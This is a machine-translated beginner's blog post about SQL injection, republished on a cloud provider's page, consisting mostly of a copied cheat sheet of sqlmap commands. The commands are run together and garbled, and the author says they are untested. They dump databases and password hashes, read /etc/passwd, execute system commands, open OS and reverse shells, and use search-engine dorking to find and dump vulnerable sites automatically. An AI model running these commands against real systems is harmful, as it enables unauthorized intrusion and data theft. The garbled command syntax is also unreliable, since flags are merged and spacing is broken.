Home > Others

Initial knowledge of SQL injection and Sqlmap

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

For SQL injection Small white I, in the morning on the Red and Black Alliance Web site of the basic knowledge of SQL injection, (skim) seems to understand how SQL injection is the same thing, also read some information about Sqlmap, once again record it

Here is about sqlmap This tool introduction, found two articles introducing sqlmap (oneself feel Good): There is a "SQL injection of Sqlmap Introduction" article Introduced Sqlmap,

Article Source: http://www.freebuf.com/articles/web/29942.html

Security-Attack SQL injection (Sqlmap all issues)

Article Source: http://www.cnblogs.com/Javame/p/3753060.html

Here are just some of the original points to introduce a brief introduction to Sqlmap, about the Sqlmap manual will be reproduced in the article:

Sqlmap is a free open source tool for detecting and exploiting SQL injection vulnerabilities, with a great feature of automated processing of detection and utilization (database fingerprinting, access to the underlying file system, execution of commands).

: https://github.com/sqlmapproject/sqlmap/

Run the code: (The following code directly copy the second article, does not test whether it can run properly; assuming that it has entered into the extracted Sqlmap file to operate)

1. Basic information

Python sqlmap.py-u"http://url/news?id=1"--current-user#get the current user namePython sqlmap.py-u"http://www.xxoo.com/news?id=1"--current-db#get the current database namePython sqlmap.py-u"http://www.xxoo.com/news?id=1"--tables-d"db_name" #List namePython sqlmap.py-u"http://url/news?id=1"--columns-t"TableName"Users-d"db_name"-V 0#column FieldsPython sqlmap.py-u"http://url/news?id=1"--dump-c"column_name"-T"table_name"-D"db_name"-V 0#Get field Contents

2. Information content

Python sqlmap.py-u"http://url/news?id=1"--smart--level 3--users#Smart Smart level performs test levelsPython sqlmap.py-u"http://url/news?id=1"--dbms"Mysql"--users#DBMS Specifies the database typePython sqlmap.py-u"http://url/news?id=1"--users#Column Database userPython sqlmap.py-u"http://url/news?id=1"--dbs#Column DatabasePython sqlmap.py-u"http://url/news?id=1"--passwords#Database user PasswordPython sqlmap.py-u"http://url/news?id=1"--passwords-u Root-v 0#list The specified user database passwordPython sqlmap.py-u"http://url/news?id=1"--dump-c"Password,user,id"-T"TableName"-D"db_name"--start 1--stop 20#list the specified fields, listing 20Python sqlmap.py-u"http://url/news?id=1"--dump-all-v 0#list all tables for all databasesPython sqlmap.py-u"http://url/news?id=1"--privileges#View PermissionsPython sqlmap.py-u"http://url/news?id=1"--privileges-u Root#view specified user rightsPython sqlmap.py-u"http://url/news?id=1"-- is-dba-v 1#whether it is a database administratorPython sqlmap.py-u"http://url/news?id=1"--roles#Enumerate database user RolesPython sqlmap.py-u"http://url/news?id=1"--udf-inject#Import user-defined functions (Get system permissions!) )Python sqlmap.py-u"http://url/news?id=1"--dump-all--exclude-sysdbs-v 0#list all tables in the current libraryPython sqlmap.py-u"http://url/news?id=1"--union-cols#Union query table recordPython sqlmap.py-u"http://url/news?id=1"--cookie"Cookie_value" #Cookie InjectionPython sqlmap.py-u"http://url/news?id=1"-B#Get banner InformationPython sqlmap.py-u"http://url/news?id=1"--data"id=3"  #Post InjectionPython sqlmap.py-u"http://url/news?id=1"-V 1-f#fingerprint discriminant database typePython sqlmap.py-u"http://url/news?id=1"--proxy"http://127.0.0.1:8118" #Agent InjectionPython sqlmap.py-u"http://url/news?id=1"--string"String_on_true_page"  #Specify KeywordsPython sqlmap.py-u"http://url/news?id=1"--sql-shell#execute the specified SQL commandPython sqlmap.py-u"http://url/news?id=1"--file/etc/passwd pythonSqlmap.py-u"http://url/news?id=1"--os-cmd=whoami#Execute system CommandPython sqlmap.py-u"http://url/news?id=1"--os-shell#System Interaction ShellPython sqlmap.py-u"http://url/news?id=1"--os-pwn#Bounce ShellPython sqlmap.py-u"http://url/news?id=1"--reg-read#read the WIN system registration formPython sqlmap.py-u"http://url/news?id=1"--dbs-o"Sqlmap.log" #Save ProgressPython sqlmap.py-u"http://url/news?id=1"--dbs-o"Sqlmap.log"--resume#Recover saved Progress Sqlmap-g "Google Grammar"--dump-all--batch #google搜索注入点自动 run out of all field attack instancesPython sqlmap.py-u"Http://url/news?id=1&Submit=Submit"--cookie="phpsessid=41aa833e6d0d28f489ff1ab5a7531406"--string="Surname"--dbms=mysql--users--password

Initial knowledge of SQL injection and Sqlmap

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
pros and cons of core knowledge curriculum sql injection attacks and defense what sql injection and prevent different types of sql injection sql injection to get username and password sql injection ignore rest of query sql injection username and password example

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More